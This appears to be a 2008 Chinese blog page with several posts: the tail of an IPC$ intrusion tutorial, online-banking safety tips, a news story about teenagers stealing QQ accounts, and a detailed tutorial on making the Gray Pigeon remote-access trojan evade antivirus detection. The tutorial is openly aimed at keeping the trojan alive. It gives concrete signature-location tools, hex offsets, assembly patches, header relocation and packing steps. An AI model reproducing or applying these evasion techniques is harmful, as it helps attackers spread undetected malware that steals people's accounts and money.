其实,这个是完完全全骇客的做法,时间长了,你就会发现,这样做一点意思也没有,渐渐的你就失去了当初的那种成就感,毕竟,在这个过程中,当你把过程摸熟了,整个入侵过程你不用用一点脑筋,不过,刚开始这么干还是有好处的,它会增加你的信心,并且,有的时候你可能会遇到一些问题,这样,你就可以慢慢的掌握一点入侵的知识了.
本来想继续写第二部ipc$入侵实用过程的,因为ipc$入侵教程我看在网上虽然有好多,可无非就是那几个模式,不怎么实用,对于新手来说,其中不可能会象他们举的例子那么顺利的,要是遇到一点问题,就根本没办法进行下去了,所以我想根据我的实战经验,写个实用的ipc$入侵教程,可是现在手真的好累,明天回学校,可能要等下个星期回到家再写了,正好这个星期,有兴趣的可以先试下我这个教程怎么样,等这个熟悉了,我们再进行下一课,好了,希望大家看完了,感觉实用的话,就顶一下! 评论这张
转发至微博
( Wed, 23 Jul 2008 22:16:00 +0800 )
Description:
随着股市的不断升温,通过网上交易的股民数量日益增加,以网上银行作为转帐、支付手段的用户大幅增加。但是,在享受网上银行带来的便捷同时,您是否注意到自己的操作可能遭到黑客的偷窥,进而带来经济损失?网银的操作风险是否可以规避?中国金融认证中心(简称CFCA)专家指出,导致这些问题并非网上银行的技术手段不够先进,而是用户没能养成良好的网银交易习惯、充分使用现有的科技手段。在此,专家特意就如何安全使用网银提供了详尽的建议。
注册篇
1、认真填写身份资料。不要胡乱填写注册资料,这些资料对网银用户的帐户而言十分重要。一旦客户将来忘记了帐户的密码、帐户被盗或被限制等问题发生,正确的填写身份资料的重要性就非常突出了。一般情况下,能够联络到客户的邮政通讯地址、***、生日、姓名等资料都必须如实填写。因为这几个资料是在处理非常情况时,找到和证明客户身份的直接证明,否则可能损失惨重。即便一个客户拥有一种网银的多个帐号,也要分别提供这些资料。
2、记录好注册提供的资料,以备后查。
3、设计好密码、提示问题等重要信息。有关此项容后细述。
出入篇
1、没事不要总是进入帐户,特别是新手,似乎一会儿不进去看看就不放心。这很容易给黑客提供盗取信息的机会。
2、不要通过代理进入帐户,在代理服务器中会留下用户的痕迹,如果有人别有用心,会很轻松的找到这些。
3、离开帐户后不要一走了之,一定要做登出,正确地退出。
4、除了在线支付,不要通过任何网站或邮件等进入网银。只通过保存的网银站点正确链接进入。
5、最好不在网吧进入网银,如果非这样做不可,起码要检查一下任务管理器,看看有没有不正常的进程在运行;退出后,清除网页的密码保存和cooikes。
6、建议最好在开机后还没有登陆其他网站时先登录网银帐户。在操作网银时候,建议不要浏览别的网站,有些恶意代码可以得到访客电脑上的信息,并利用这些信息攫取用户的账号。退出帐户后再去其他的网站。
7、多帐户操作时,切记不要同时进入,一定要退出前一个再进入后一个。
密码篇
1、密码要足够长,并且最好同时使用大、小写字母以及数字和其他字符。
2、不要用生日、姓名、地址等做密码,容易被猜出。应当是自己清楚而别人想象不到。更好的是自己也不清楚有什么意义和规律。
3、不要与任何其他的密码一样或相近。
4、在输入密码的时候,可以通过多次的部分密码复制、粘贴的方式进行,以免被键盘记录器记录。粘贴的次序也可以打乱,再加上错误的字符删除,这样就没有任何一个简单的记录器能盗取了。
5、网银一般可以提供一些加密的软键盘,目的是防键盘鼠标***,除非对方攻破了指点数据包(那是128位加密的,很难被攻破的,除非是EG公司本身的问题)是不会被盗的。
6、把密码保存好,最好是不要记录在计算机里。
7、网银站点提供的安全措施,如EG提供的PIN效验,一定不要关闭!即便麻烦一点也要坚持。一旦发现有异样,立刻更换密码。
8、除了密码+附加码的基本认证外,目前银行有动态口令、文件数字***、移动数字***等安全措施,如“USBKEY”。客户最好搭配使用多种方式,为自己的钱包多加几道锁。
邮箱篇
1、网银使用的邮箱一定要可靠、迅速,最好是专用的。如果有条件,可以使用收费的邮箱。
2、几乎所有的网银都已经声称不会向用户发送一些特别是关于密码之类的邮件,所以不要轻易打开不明来历的邮件,特别声称是某个网银来的邮件、特别是带附件的邮件。也不要点击邮件中的任何连接。这些操作可能带来木马病毒或者将客户引向假网站,进而造成损失。
网络安全篇
本文涉及的内容,其实也适用于其它的网络安全。
1、定期更新杀毒、防火墙和防黑的系统,定期检测和清理机器,保证去除各种间谍件。
2、有选择的定期清除Cookies及历史。
3、清楚机器启动加载运行的程序有那些,去除不必要的东西。 评论这张
转发至微博
( Thu, 17 Jul 2008 23:05:00 +0800 )
Description:
分享木马免杀全攻略
自从病毒与杀毒软件的诞生以来,他们之间的战争就从来没有停止过多套特征码自动脱壳内存杀毒主动防御等等的出现为网络安全做出了一次次的贡献,当然黑客们也毫不逊色,也出现了修改特征码加双层变态壳去文件头等新的免杀技术 古人云知己知彼,方能百战不殆! 今天,我们就以一个病毒防御工作者的角度来做我们的免杀工作想不被杀,就要先知道是怎么杀的,还不太懂的朋友赶紧偷偷借机恶补吧
1.杀毒原理 通常,一个病毒防御工作者拿到一个截获或上报上来的病毒时,先是分析这个病毒文件执行后的动作,所谓动作,就是指病毒文件执行后会做哪些操作例如会生成什么新文件怎样更改注册表怎样注册服务打开什么端口等等 搞明白这些后,下一步一般会研究这个病毒的文件结构,然后找出与众不同的地方,将其定义为特征码而这个特征码定义的高明与否,就要看他定义的位置是否刁钻,例如他如果定义的是病毒文件更改注册表键值那部分代码的话,这显然不会太难!因为只要病毒文件更改键值,99%的情况下这个文件里一定存在被更改键值的字符串,所以找到这段字符串的位置就可以定义特征码了但是针对这种特征码做免杀是非常容易的,只需找到相应的位置,并更改字母的大小写即可而如果从文件头找出一段特征码就是非常不容易的事情了除此之外,所定义的特征码还有一个分支,即内存特征码所谓内存特征码就是指木马文件运行后释放到内存时所存在的特征,它的原理大体与上面介绍的文件特征码一样 当特征码定义出来之后,就会被提交到另外的一个部门,然后进入病毒定义库,当用户更新后,以后杀毒软件在碰到符合要求的文件时就会将其毫不忧郁的杀掉!也就是说,杀毒软件只认特征码,不认文件 由此可见,病毒防御工作者寻找特征码的方式也不过如此,但这只是定义病毒文件特征码的工作,别的例如修复被感染文件等技术步骤和本文无关,在这也就不介绍了,有兴趣的朋友可以自己研究一下
2.免杀分类 免杀的方法有很多,无奈没见哪为朋友综合系统的介绍,也苦了小菜们求学无门,只好掏银子找师傅,所以我就自告奋勇站出来一次,不足之处还请各位高手多多包涵 我个人总结的免杀方法总共分两类,即主动免杀与被动免杀
一主动免杀
1.修改字符特征:主动查找可能的特征码,包括木马文件修改注册表生成新文件的名称与路径注入的进程名等动作,也包括运行过程中可能出现或一定会出现的字符等文件特征然后找出这些字符,并将其修改
2.修改输入表:查找此文件的输入表函数名(API Name),并将其移位
3.打乱文件结构:利用跳转(JMP),打乱文件原有结构
4.修改入口点:将文件的入口点加1
5.修改PE段:将PE段移动到空白位置
二被动免杀
1.修改特征码:用一些工具找出特征码并针对特征码做免杀处理
2.用Vmprotect:使用Vmprotect加密区段
3.文件加壳:可以用一些比较生僻的壳对木马文件进行保护 有的朋友看到这里有可能蒙了,PEVmprotect入口点这些都是什么意思啊?不要着急,下面我会一一介绍的,只要你看完这篇文章,就一定会成为免杀高手!怎么样?Go!
3.实战演习
1.)修改字符特征 好,下面我们依然以一个病毒防御工作者的角度来考虑我们每一步应该做什么,然后在利用逆向思维分而治之 现在假如我们拿到一个木马样本灰鸽子,首先当然要分析它究竟有什么功能,怎样运行以及怎样保护自己等其实这一步要求的专业知识是很多的,但考虑到我们的读者,我们暂且用一个比较简单易行的方法运行木马AND查看此程序的帮助文档 我们打开RegSnap,新建一个快照,打开RegSnap后,点击[新建快照]按钮(如图1),在弹出的对话框中选择[生成所有项目的快照](如图2) 然后保存快照,现在已经将RegSnap配置好了,下面运行我们的木马程序(提醒:做免杀时,一定要记住养好随时备分的好习惯,以防止修改错误或是实验运行时破坏删除木马)
木马运行完毕后,我们在按照上面的方法重新做一个快照并保存,然后按快捷键F5,在弹出的比较快照对话框中选择刚才保存的快照,在第一个快照中选择我们刚才第一次保存的快照,而第二个快照选择我们后保存的快照存档,很快结果就出来了(如图3) 有的朋友对于使用RegSnap收集到的信息感到无力分析,抱怨收集到的东西太多,在这里我简单的介绍一下,首先应注意的是生成做对比的两个快照之间的时间要尽可能短,另外要排除带有OpenSaveMRU的注册表键值,还要排除有关*.r 文件的创建读写等操作记录下面我们就将有用的信息提取出来,逐一分析
文件列表于 C:\WINDOWS\*.*
新增文件
木马.exe
注册表报告
新增主键
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\A1Pa -admin\桌面\huigezi\复件 Server02.exe
键值: 字符串: "复件 Server02"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_*6728*9A6C*670D*52A1\0000\Cla 键值: 字符串: "LegacyDriver"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_*6728*9A6C*670D*52A1\0000\Cla GUID
键值: 字符串: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_*6728*9A6C*670D*52A1\0000\Control\ActiveService
键值: 字符串: "木马服务"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\木马服务\Description
键值: 字符串: "灰鸽子服务端程序远程监控管理." 这里我只摘录了部分关键性的木马动作记录,全部记录请见光盘通过文件列表我们可以知道木马在WINDOW目录下生成了一个新文件,而通过注册表的监控信息我们也知道了木马是怎样将自己注册为系统服务并自动运行的 那么我们回到瑞星的研究分析室,看看那些大哥大姐们会怎么办 瑞星大哥:最近这灰鸽子太猖狂啦!我们是不是应该多定义几套特征码? 瑞星大姐:恩,不错!先在注册表那定义一套特征码在说吧 A1Pa :STOP!!(只见画面突然定格,A1Pa 将播放器最小化) 通过上面的对话,我们可以知道他们要将注册表的某个字符定义为特征码,从上面RegSnap分析出来的记录来看,他们的选择真的是太多了!那么他们究竟会用到哪些呢?其实,就做为一个黑客来讲,只要不影响服务端正常运行,就应该尽量多的改掉木马的所有字符,当然全部改变是不可能的,除非你自己编写木马 有的朋友要问了,除了注册表别的就不可以改了吗?***当然是否定的,譬如生成新文件的名称与路径注入的进程名等动作,这些我们可以利用WINDOWS对字母大小写不敏感的这一特点直接替换字母的大小写,而对于运行过程中可能出现或一定会出现的字符等我们可以直接将其替换成别的内容
下面我为大家演示一下怎样更改注入进程的名称 首先配置服务端,通过图4我们可以看出来灰鸽子的启动运行是需要IEXPLORE.EXE这个进程的,根据注册表的推理,我们可以认为其未加壳的服务端是应该存在IEXPLORE.EXE这一字符串的既然如此,我们就先请出我们的第一把武器WinHex! WinHex是一款极为出名16进制编辑器得到 ZDNetSoftwareLibrary 五星级最高评价,拥有强大的系统效用在这里,我们只用它来编辑文件,其余不做过多讨论首先我们用WinHex打开我们的木马文件Server.exe,打开后如图5所示 然后我们按[Ctrl]+[F]快捷键调出查找文本对话框,输入IEXPLORE.EXE后点击是(如图6) 结果如图7所示下面我们就对其进行大小写转换,用鼠标点击要更改的字母(例如I),然后在按键盘上的i,即可完成更改,就象使用WINDOWS的记事本一样更改完毕后,按[Ctrl]+[S]快捷键保存即可 就这么简单?对!就这么简单!其他的例如注册表生成新文件的名称与路径等等都可以利用此方法更改 但是不幸的是,经过这样改后,还不足以对付例如金山江民等品牌杀毒软件,要想对付这些杀毒软件的查杀,我们还需要对我们的木马进行进一步处理 下面,我们开始学习输入表函数(APIName)免杀!
2.)修改输入表 不知有的朋友是否知道,PE文件的正常运行是离不开其内部输入表函数的,而不同的程序,其内部输入表函数的名称与在文件中的位置是不一样的,所以输入表函数也成了病毒防御工作者制作特征码紧盯的地方之一在我查出来的关于灰鸽子的特征码来看,瑞星大哥已经将其的一处输入表函数作为特征码了所以掌握输入表函数免杀技巧对于新入门的朋友来说势在必行! [PE文件小知识:PE文件是WINDOWS系统中特有的一种文件结构,它包括PE文件头输入表与相关资源文件等等] 经过我的测试,直接单独修改文件内部的输入表函数会导致程序运行不正常甚至崩溃!那就没有办法了吗?我可没那么容易认输!经过一翻苦战,终于让我在LordPE中找到了解决办法,同时FoBnN的文章也给了我非常大的启发 我们先打开LordPE,点击[PE编辑器]按钮,在弹出的对话框中选中木马文件,打开后点击[目录](如图8),再点击导入表后面的[](如图9) 在弹出的对话框中我们选择wininet.dll下的InternetOpenUrlA(如图10),有的朋友要问了,为什么非选择InternetOpenUrlA这个输入表函数呢?呵呵!那是因为这个输入表里有特征码哦,关于怎样确定特征码,我在后面会介绍,大家先别着急 好的,关于LordPE就先停在这,下面我们就用WinHex来查找InternetOpenUrlA这个输入表函数的所在位置,并将其用0填充(操作方法:单击WinHex右面的16进制信息,输入0即可)(如图1112) 然后将其写到空白区域(既显示000000的区域),一定要从头开始写入,这样在以后计算地址时不容易出错,除此之外也要注意输入表函数的大小写不要搞错(如图13) 保存后我们在回到LordPE那里,在需要更改的InternetOpenUrlA输入表函数上单击右键,在弹出的菜单里选择编辑,将Thunk里的信息改成000B9D5E(如图14)即可 有的朋友要问了,刚才我们不是把那个输入表函数放到000B9D60那里了吗?到这怎么变成000B9D5E了?其实原理很简单,因为每个输入表函数前面都是有一个空格的,我们虽不用真正把那个空格加进去,但填写它的地址时一定要空出来,否则就会出错!而将000B9D60减去一个空格所占的位置,其地址正好为000B9D5E,还不十分明白的朋友在仔细看看图13,下面我们在回到LordPE,看看我们改过的输入表函数变成什么样了(如图15)? 那我们该怎么办呢?其实简单的很,只要在重新改一下输入表函数的名称就可以了(如图16) 有的时候因为我们所填写的地址为比较靠后的,例如我们现在改的这个000B9D5E,后面仅能容纳两个字节,所以更改输入表函数时只能键入两个字,对于这种情况我们可以先把Thunk里的信息改成如000B9D60这样的起始地址,改输入表函数名更改完毕后在将000B9D60改回原来的值(既000B9D5E),保存后即可成功,我们试一下看看(如图17) 经测验鸽子的各项功能均正常!在用瑞星查一下试试(如图18),结果当然不言而喻
3.)修改特征码 虽然到这我们免杀已经成功,但是为了学到更多的技术,为了让我们免杀的鸽子存活的更久,下面我在为大家介绍一下特征码的查找与修改技巧 特征码是杀毒软件的心脏,但同样也是我们的心脏!就看谁先找到对方地心脏,并能发出致命一击,谁就是胜利者! 一提到查找特征码,就不得不说说MyCCL与CCL,这两个软件的名字相信留心过免杀技术的朋友不会陌生,但由于软件操作的傻瓜化,很多时候对于CCL的介绍只是一带而过,这可苦了入门的朋友! 这一小节我就先介绍一下MyCCL的用法 我们先来认识一下MyCCL(如图19),根据这张图我们下面就来大体介绍一下MyCCL的应用方法首先点击第1处选择文件,然后在第2处输入分块个数,分块个数越多,定位越精确,然而生成的速度同时也就越慢,生成的文件总体积也就越大,就象灰鸽子这么大的服务端,如果分块数为300的话,那么它生成文件的总体积将超过230M!所以在这里不建议填写太大的数字,一般象灰鸽子这样的服务端分块数填400个就足够了生成完毕后会弹出个对话框提醒你去相应目录杀毒,图中所示为E:\文章\极度免杀\鸽子\OUTPUT文件夹,我们到那个文件夹下开始杀毒,查到病毒就让杀毒软件将其彻底删除,注意,这一点很重要!处理完毕后点击第3处的二次处理,在点击[生成]上面的[特征区间]按钮即可出现右面的对话框 下面我们在区间设定里右键单击特征码区间,在弹出的菜单中选择复合精确定位此处特征(如图20),然后重复上面的操作,直到你认为[单位长度]已经小到很方便更改的时候,特征码的定位就算结束了 好了,一口气说了这么多,不知道刚入门的朋友是否懂得一些MyCCL的用法了没有 但是上面我们定位的是文件特征码,还有内存特征码没有定义,这里我们要用到CCL的内存特征码定位功能,打开CCL后,我们依次选择[文件][特征码验测][内存特征码](如图21) 在弹出的对话框中选择我们要进行免杀操作的木马,然后会进入定位范围选择窗口(如图22) 由图中可知,第一个CODE段的偏移量为00000400,也就是说我们可以用00000400做为起始位置,那么我么就在用户输入区的起始位置处填写00000400,下面的那个验测大小怎么填写呢?看到图22中画线的那个当前文件大小了吗?我们可以用WINDOWS系统自带的计算器进行计算,把计算器的查看菜单设置为科学型十六进制四字(如图23) 然后用当前文件大小的值减去起始值00000400,得到的结果为000B9A00,那么我们就在验测大小后填上000B9A00,然后点击填加区段按钮(如图24) 最后点击确定,在新弹出的对话框中点击运行,不过需要注意的是,在进行此步操作时一定要打开杀毒软件的所有功能下面你要做的就是等待 然而光找特征码是不够的,我们还得学会怎样更改,而关于特征码地更改是非常有学问的!这里为了方便广大读者能学以致用,在此我只介绍部分理论知识,着重介绍实践操作,但是我想请大家注意,免杀的方法象你做完免杀的木马一样,都有生存时间,而过了这个时间,这种免杀方法就变的不在实用,或者免杀效果大打折扣!所以要想真正成为免杀高手,还的打牢基本功,不断创造出新的免杀方法,因为我们是在与杀毒软件厂商的专业技术人员斗法啊! 关于需要注意的问题就先讲的这,下面我带大家先来了解一下目前更改特征码的办法
1. 大小写替换(只适用于文件免杀)
适 用 于:出现可识别的英文字母或词组,并且确定其不是相关函数(如输入表函数)
操作方法:如咱们实战演习的第一节讲的一样,只须将大小写替换一下就可以了,例如特征码中出现了A,你只要将其替换为a即可
原 理:利用WINDOWS系统对大小写不敏感,而杀毒软件却对大小写非常敏感这一特性达到免杀目的
2.用00填充
适 用 于:几乎任何情况,但成功率不是非常高
操作方法:例如我们找到了一处特征码0009EE7F_00000005,那么根据这段特征码信息我们可以知道它的位置在0009EE7F,大小为5个字节,也就是0009EE7F-0009EE83这一段内容(如图25) 一直跟着文章实践操作的朋友肯定有疑问,你是怎么找到那个地址的呢?而我怎么找不到呢?那是因为WinHex的默认偏移量为decimal模式,我们单击Offset栏将其改为16进制模式即可(如图26) 然后我们有选择的一处处地用00填充(如图27) 记住要多试几次,80%的情况下你都能找到一处既能免杀又不影响程序正常运行的区域对于定义出的内存特征码,只要将其内存地址用一个叫做便宜量转换器的小程序转换成16进制偏移量,然后在进行相应操作即可
原 理:由于PE文件的特殊格式以及程序编译语言等问题,使得生成目标代码的效率并不高,难免出现一些垃圾信息,而这些信息存在与否对与程序是否能正常运行并不起决定性的作用,而当木马的这部分垃圾信息被定义为特征码时,我们完全可以将其删除,而删除的方法就是用无任何意义的00将其替换
3.跳到空白区域
适 用 于:几乎任何情况,成功率比较高
操作方法:还是以特征码0009EE7F_00000005为例子,假如我们使用00填充的方法失败了那么不要多想,接下来马上试试OllyDbg,关于OllyDbg我就不多介绍了,它是非常棒而且非常专业的一个动态反汇编/调试工具,这里我们只用它来帮助我们进行免杀作业,首先应该做的就是将我们的16进制偏移量0009EE7F转换为内存地址,因为OllyDbg的工作原理是先将程序释放到内存空间里,然后才能进行相关作业这里要用到的是一个叫做便宜量转换器的小程序,我们用其转换完毕后得到的内存地址为0049FA7F(如图28) 下面我们用OllyDbg打开我们的木马服务端,首先找到一处空白区,并域记下这的地址004A24A5,然后找到我们刚转换过来的地址0049FA7F,先将以0049FA7F开始以下的这三行数据选定,然后单击右键选则[复制][到接剪贴板](如图29) 将其复制到本文文档里备用,然后在将这三行代码一一NOP掉(如图30) 最后右键点击0049FA7F,在弹出的对话框中选择汇编,并写入jmp 004A24A5这条汇编指令(如图31) 记住,在点击[汇编]按钮之前一定先把使用 NOP 填充前面的勾去掉然后我们记下汇编后0049FA7F的下面那个地址0049FA84(仔细观察图31)好,下面我们回到004A24A5这处刚才找到的空白地址(如图32) 然后用刚才汇编的方法把在本文文档里备用的信息一句句地汇编进去,然后在将最后一句代码的下一行004A24AA处加入jmp 0049FA84这行代码(如图33) 然后单击右键[复制到可执行文件][所有修改](如图34) 在弹出的对话框中选择全部复制然后保存即可而对于内存免杀就省去了内存地址转换这一步了
原 理:大家先看图35,由图中可知,正象此方法的名字跳到空白区域一样,这种方法的原理就是将原本含有特征码的信息转移到空白区域,并把原先位置的信息全部NOP掉,并在那里加一个跳转指令,让其跳到004A24A5处,也就是我们找到的空白区域,并把原来在0049FA84的信息移到这里,加完信息后在加一条指令让其在跳回去,以使程序连贯起来 4.上下互换
适 用 于:几乎任何情况,成功率比较高
操作方法:先用OllyDbg载入木马程序,假定其特征码为0009EE7F_00000005,我们还是先用偏移量转换器将其转换为内存地址,上面我们已经知道0009EE7F对应的内存地址为0049FA7F,然后在OllyDbg中找到相应位置,利用上面跳到空白区域里介绍的修改方法将0049FA7F上下两句代码调换位置即可而对于内存免杀就省去了内存地址转换这一步了
原 理:杀毒软件的特征码定位是严格按照相关偏移量于内存地址进行的,而其实我们的应用程序中的机器码执行顺序的先后在一般情况下是没有死规定的,所以我们只需将其上下互换,杀毒软件自然就不认识了
5.ADD与SUB 互换
适 用 于:在内存特征码中出现ADD或 SUB指令的,成功率比较高
操作方法:用OllyDbg载入木马程序,假定其特征码所对应的地址中有ADD或SUB指令,例如00018A88:XXXXX 00000088 ADD ECX 10000000
我们可以将ADD ECX 10000000这段机器码改为SUB ECX F0000000,
更改完毕后保存为EXE文件即可
原 理:我们都知道1+1=2,我们也知道1-(-1)=2,上面就是利用了这个原理,其中ADD指令的就是加意思,而SUB则是减的意思虽然被我们互换了一下,但是最终结果还是一样的,可是换完之后杀毒软件就不认识了 到这里,关于特征码的查找与修改就讲完了,但是除此之外呢?***是还有许多!!下面我们就一起看看其他免杀方法
4.)其他免杀方法
改文件头: 这里所说的改文件头包括加头去头,文件加花关于加头去头,我们还是用OllyDbg用OllyDbg载入后,OllyDbg会自动停在入口点(如图36) 我们将头三行机器码复制保存起来,然后找到空白区域,用汇编的方法一一将其写入(如图37) 然后在后面写入一条JMP指令,让其跳到初始入口点的第四行,相信一直仔细看本文的朋友一定明白其原理,如果忘了的话可以看上面修改特征码的第三种方法,原理与这差不多,修改完毕后如下所示:
004A2A73 0000 add byte ptr ds:[eax],al
004A2A75 0000 add byte ptr ds:[eax],al
004A2A77 55 ush e 004A2A78 8BEC mov e ,e 004A2A7A B9 04000000 mov ecx,4
004A2A7F ^ E9 CCF3FFFF jmp Server.004A1E50
004A2A84 0000 add byte ptr ds:[eax],al
004A2A86 0000 add byte ptr ds:[eax],al
004A2A88 0000 add byte ptr ds:[eax],al 上面的add byte ptr ds:[eax],al就是所谓的空白区域,我们看到改完后的头文件位于004A2A77,所以我们还要用PEditor改一下入口点,打开PEditor后载入文件,将入口点处的地址改为我们的新文件头地址004A2A77(如图38),保存后即可
入口点加1: 打开PEditor后载入文件,将原来的入口点+1即可,例如我们的入口点为004A2A77,加1后应该是004A2A78(如图39),然后点击应用更改即可完成更改 用这种简便的免杀方法即可以轻松的对付大部分杀毒软件
用Vmportect加密: Vmportect是新一代的软件保护程序,利用虚拟机保护代码,可以对指定的部分区段进行加密,能让被保护的程序复杂化,最开始他被用于PcShare里的SYS文件免杀,效果值得称道!其实对于普通文件他照样发挥的比较出色!下面我们就用他来加密我们的那个存在特征码以0049FA7F开始的区段打开Vmportect后载入程序,在转储选项卡下的任意地方单击由键,在弹出的菜单中选择前往地址(如图40) 然后在弹出的对话框中填入0049FA7F,点击是按钮即可跳到相应位置,然后点击添加地址按钮(如图41) 并选则是即可,最后点击编辑按钮即可对以0049FA7F开头的区段进行加密(如图42)
移动PE段的位置: 关于这种方法,可是绝学!今天借此机会贡献给各位朋友,希望此方法能在你免杀时助你一臂之力!那么修改PE段究竟能起到什么作用呢?首先当然可以达到长期免杀的目的,其次可以保护我们的免杀文件,其他人无法学走我们的免杀方法(A1Pa :要想真正达到这个目的,除此之外你还不能让别人看到这篇文章,所以这期的X档案赶紧全包了吧!呵呵!)为什么呢?因为一些反汇编工具无法载入经过修改PE文件头的程序 我们先来看看PE段,怎么看?先用WinHex载入我们的木马(如图43) 看到图中PE那两个字了吗?这两个字的P所在位置就是PE段的入口点,我这里是00000100我们在仔细看看图43,看看PE下一行的第一个16进制是不是E0?好,下面我们用WINDOWS系统自带的计算器计算一下,得到16进制的E0就是十进制的224这是什么意思呢?它代表的就是PE段的大小,在WinHex中一行能显示16个字符,224个字符正好是14行,我们将这14行内容复制保存起来,并记住PE段的末尾地址,我这里是000001EF,最后将这个PE段用0填充(如图44) 最后将我们事先保存的PE段上移,但注意不要超过This program must be run under Win32这段内容由于PE段的上移,其体积必然也就随之增大,而从我们现在PE段所处的00000080到000001EF,总共是368个字节,换成16进制为170,全部更改完毕后如图45所示
针对瑞星: 先用OllyDbg载入文件,只要将其第一条机器码push e 改为pop e 即可躲过瑞星的内存杀毒
加壳压缩: 加壳是菜鸟的专利,虽然操作简便,但是免杀效果与报质期都不尽人意,但是做完免杀后在加个压缩壳还是很有必要的 加壳免杀的第一步就是要找到好壳,大家没事可以到看雪论坛逛逛,他那里经常有好壳出现但关于加壳的一些操作步骤我在这里就不费笔墨了,大家下去自己一看就会,其实就是个使用软件的过程 好了,到这里,我们对木马的免杀就做完了,总共用了七大类共计14种方法!恐怕一时理解起来比较困难下面我就在用苏式教育的方法为各位读者规划一下本文所讲的知识,方便各位读者以后应用与查找
免杀的操作顺序:
1.主动查找可能存在的特征码
2.用CCL等查找特征码,并将其更改
3.尽可能多的更改输入表函数
4.更改文件头
5.Vmportect区段加密
6.移动PE段的位置
7.加壳压缩
免杀分析:
一主动查找可能的特征码
操作时注意:有关注册表文件路径的信息最好只用大小写替换的方法,不要改成其他内容,那样容易出错
优 点:可以防范未来将要出现的特征码,并且同时可以体验DIY的乐趣,顺便打造自己的专用木马
不 足:无法进行有效的免杀,效果不明显
成 功 率:几乎100%,只要不改错地方,一般更改后的程序完全可以正常运行
二尽量多的更改输入表函数
操作时注意:将输入表函数移动到新位置时,函数名的第一个字母最好在本行开头,另外注意地址的填写规律,不要弄错
优 点:可以防范未来将要出现的特征码,给特征码的定位带来干扰
不 足:无法进行有效的免杀,效果不明显
成 功 率:只要操作上没问题,基本能保证90%以上!
三用例如CCL等工具查找特征码并将特征码更改
操作时注意:此步骤最需要的就是耐心与细心!不能丢三落四,要及时做好备份,以防不测
优 点:针对性非常强,免杀中最有效的方法之一
不 足:只能针对一个杀毒软件进行免杀,无法针对多个杀毒软件进行作业,免杀文件的存活期短另外,此方法也非常耗费时间
成 功 率:理论上100%,主要看你的经验与编程汇编的底子不过其实只要有足够的经验与方法,成功率就异常可观了!
四移动PE短位置
操作时注意:16近制的转换一定要细心,并且时刻不要忘了开头与结尾的位置
优 点:可延长免杀期,时对付特征码在PE文件头部的必杀技!同时可以保护我们的免杀文件,其他人无法学走我们的免杀方法
不 足:除加壳外,就无法在对木马文件做进一步加工了
成 功 率:大约75%左右,不确定的因素太多
五更改文件头
操作时注意:删除部分信息时文件结构的变化
优 点:比较节省时间,免杀效果也很明显,是免杀中的有效方法之一
不 足:免杀时间不长
成 功 率:大约80%左右
我就是改改入口点.跳转下就可以了.效果还好.最简单的办法.
----------------------------
一键转贴,快速捕捉生活精彩,赢每周好礼! 评论这张
转发至微博
( Thu, 17 Jul 2008 23:00:00 +0800 )
Description:
少年黑客专偷QQ自爆月赚3万元
一位不到二十岁的学生,网上挂马偷QQ,一个月的收入就有超过五位数!广州的黑客文找到记者时这样说道黑客文爆料的意图很简单,他不忿以往崇尚自由的黑客们正逐渐变成追逐利益,参与犯罪的骇客 ...
一位不到二十岁的学生,网上挂马偷QQ,一个月的收入就有超过五位数!广州的黑客文找到记者时这样说道黑客文爆料的意图很简单,他不忿以往崇尚自由的黑客们正逐渐变成追逐利益,参与犯罪的骇客而由这些骇客们构建的网络犯罪工业更呈日益壮大之势,并对任何意图制止的行为进行攻击
就在上周六,代表17名被盗QQ的网友与腾讯公司交涉的广东公益诉讼网就突然遭到攻击,一度瘫痪5小时而专门接受此类官司的广东国智律师事务所律师陈军则告诉记者,网络上的虚拟犯罪,人们往往认为离自己很远其实,从其受理的案件来看,虚拟犯罪早已与现实接轨,并形成自身的运转体系在不久前他受理的一宗信用卡诈骗案中,犯罪分子使用的信用卡信息就是一名80后的广东黑客从网上窃取的
越来越多年轻人参与网络犯罪
按照黑客文的指引,记者找到了一名广州少年黑客的博客在这个公开的博客上,这名不到20岁的年轻黑客,脑中就没有犯罪的概念,坦然在日志中简短地记录了自己参与网上挂马盗窃QQ号之后的收入情况:由月收入1500元(妈妈给的)到3万元
黑客文说,随着网络收费时代以及越来越多网络交易平台的构建,网上的黑色产业早已形成了链条黑客通过挂上木马等后台病毒,盗窃以千万计的个人信息,这些信息包括QQ号码游戏账号,游戏货币信用卡信息等,在分类和抽检后,制作成各类信封(如QQ信封),卖给中间商,中间商再通过网上交易平台出售给需要的客户而正是由于有大量黑客软件的出售,使盗窃个人信息的技术要求大幅降低,越来越多的年轻人在利益的诱惑下参与到网络犯罪当中
帮网友找QQ却遭黑客入侵
在广州珠江新城内,记者找到了广东公益诉讼网的负责人刘华刘华说,这些天以来,他们一直在帮助17名丢失QQ号的网友与腾讯公司交涉,并在志愿者律师的帮助下,发出律师函,要求腾讯公司将这17个QQ号返还虽然从目前情况来看,腾讯公司已经明确拒绝了这样的要求但公益诉讼网的行为明显触怒了不少黑客,于是,在上周六,广东公益诉讼网遭到了黑客的入侵,并一度瘫痪5个小时黑客在更改了诉讼网主页面上公然留言到:&am time am time 你们,还帮别人找QQ,先把自己网站安全搞定再说
你们有没有报警?面对记者的询问,刘华却苦笑着说,他们不觉得类似这样的事件报警后会有怎样的结果实际上,在帮网友代理QQ申诉案件中,他们就屡屡碰到腾讯公司与网监部门互相踢皮球而实际上,从法律角度而言,QQ号码本身的确没有什么价值,但伴随的损失却十分巨大物质的有会员费游戏装备和Q币等等;非物质的则包括结婚纪念照商务客户的联系方式以及网络硬盘里的重要私人文件
信用卡信息400元/GB叫卖
公益诉讼网的志愿律师陈军受理了不少网络犯罪的诉讼案
